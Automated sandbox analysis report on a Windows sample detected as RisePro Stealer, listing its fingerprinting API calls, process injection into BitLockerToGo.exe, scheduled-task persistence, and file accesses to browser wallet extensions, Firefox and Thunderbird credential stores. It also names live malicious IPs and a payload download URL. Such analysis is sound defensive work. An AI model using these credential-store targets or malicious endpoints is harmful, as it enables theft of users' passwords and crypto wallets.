Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: EnumSystemLocalesW, 3_2_02E52EEC
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: EnumSystemLocalesW, 3_2_02E52E51
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: EnumSystemLocalesW, 3_2_02E52E06
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_02E52F77
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW, 3_2_02E52D5F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_02E532F3
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW, 3_2_02E533F9
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW, 3_2_02E531CA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: EnumSystemLocalesW, 3_2_02E4B1B1
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoW, 3_2_02E4B734
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_02E534CF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: GetLocaleInfoEx,FormatMessageA, 3_2_02E31D94
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02EE06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey, 3_2_02EE06D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Code function: 3_2_02F44C30 GetVersionExA,GetFileAttributesW,GetFileAttributesA, 3_2_02F44C30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected Clipboard Hijacker
Source: Yara match File source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 23.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.KSExO5GhJ2KIj6jiDKtz.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 20.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 22.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
Yara detected RisePro Stealer
Source: Yara match File source: 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2335364772.00000000077EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\9VicU2EcsIoeWuNiSqblWRg.zip, type: DROPPED
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\signons.sqlite Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\logins.json Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\0absryc3.default\signons.sqlite Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENT Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Remote Access Functionality
barindex
Yara detected RisePro Stealer
Source: Yara match File source: 00000003.00000003.3323243093.000000000749F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.4563708382.000000000749F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2335364772.00000000077EF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\9VicU2EcsIoeWuNiSqblWRg.zip, type: DROPPED
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1445936 Sample: file.exe Startdate: 22/05/2024 Architecture: WINDOWS Score: 100 58 ipinfo.io 2->58 60 db-ip.com 2->60 68 Snort IDS alert for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Antivirus detection for dropped file 2->72 74 4 other signatures 2->74 10 file.exe 2 2->10         started        13 oobeldr.exe 2->13         started        15 AdobeUpdaterV2.exe 2->15         started        17 4 other processes 2->17 signatures3 process4 signatures5 84 Writes to foreign memory regions 10->84 86 Allocates memory in foreign processes 10->86 88 Injects a PE file into a foreign processes 10->88 19 BitLockerToGo.exe 1 91 10->19         started        90 Antivirus detection for dropped file 13->90 92 Multi AV Scanner detection for dropped file 13->92 94 Detected unpacking (changes PE section rights) 13->94 24 schtasks.exe 1 13->24         started        26 schtasks.exe 1 17->26         started        process6 dnsIp7 62 185.172.128.136, 49705, 49709, 50500 NADYMSS-ASRU Russian Federation 19->62 64 185.172.128.82, 49708, 80 NADYMSS-ASRU Russian Federation 19->64 66 2 other IPs or domains 19->66 48 C:\Users\user\...\KSExO5GhJ2KIj6jiDKtz.exe, MS-DOS 19->48 dropped 50 C:\Users\user\AppData\Local\...dgeMS2.exe, MS-DOS 19->50 dropped 52 C:\Users\user\AppData\Local\...\l2[1].exe, MS-DOS 19->52 dropped 54 3 other malicious files 19->54 dropped 76 Found evasive API chain (may stop execution after checking mutex) 19->76 78 Tries to steal Mail credentials (via file / registry access) 19->78 80 Found stalling execution ending in API Sleep call 19->80 82 6 other signatures 19->82 28 KSExO5GhJ2KIj6jiDKtz.exe 1 19->28         started        32 schtasks.exe 1 19->32         started        34 schtasks.exe 1 19->34         started        36 conhost.exe 24->36         started        38 conhost.exe 26->38         started        file8 signatures9 process10 file11 56 C:\Users\user\AppData\Roaming\...\oobeldr.exe, MS-DOS 28->56 dropped 96 Antivirus detection for dropped file 28->96 98 Multi AV Scanner detection for dropped file 28->98 100 Detected unpacking (changes PE section rights) 28->100 40 schtasks.exe 1 28->40         started        42 conhost.exe 32->42         started        44 conhost.exe 34->44         started        signatures12 process13 process14 46 conhost.exe 40->46         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.117.186.192
 ipinfo.io United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
185.172.128.82
 unknown Russian Federation
50916 NADYMSS-ASRU true
185.172.128.136
 unknown Russian Federation
50916 NADYMSS-ASRU true
172.67.75.166
 db-ip.com United States
13335 CLOUDFLARENETUS false

Contacted Domains

Name IP Active
ipinfo.io 34.117.186.192 true
db-ip.com 172.67.75.166 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://ipinfo.io/widget/demo/8.46.123.175 false
  • Avira URL Cloud: safe
 unknown
http://185.172.128.82/server/k/l2.exe true
  • Avira URL Cloud: safe
 unknown
https://db-ip.com/demo/home.php?s=8.46.123.175 false
  • Avira URL Cloud: safe
 unknown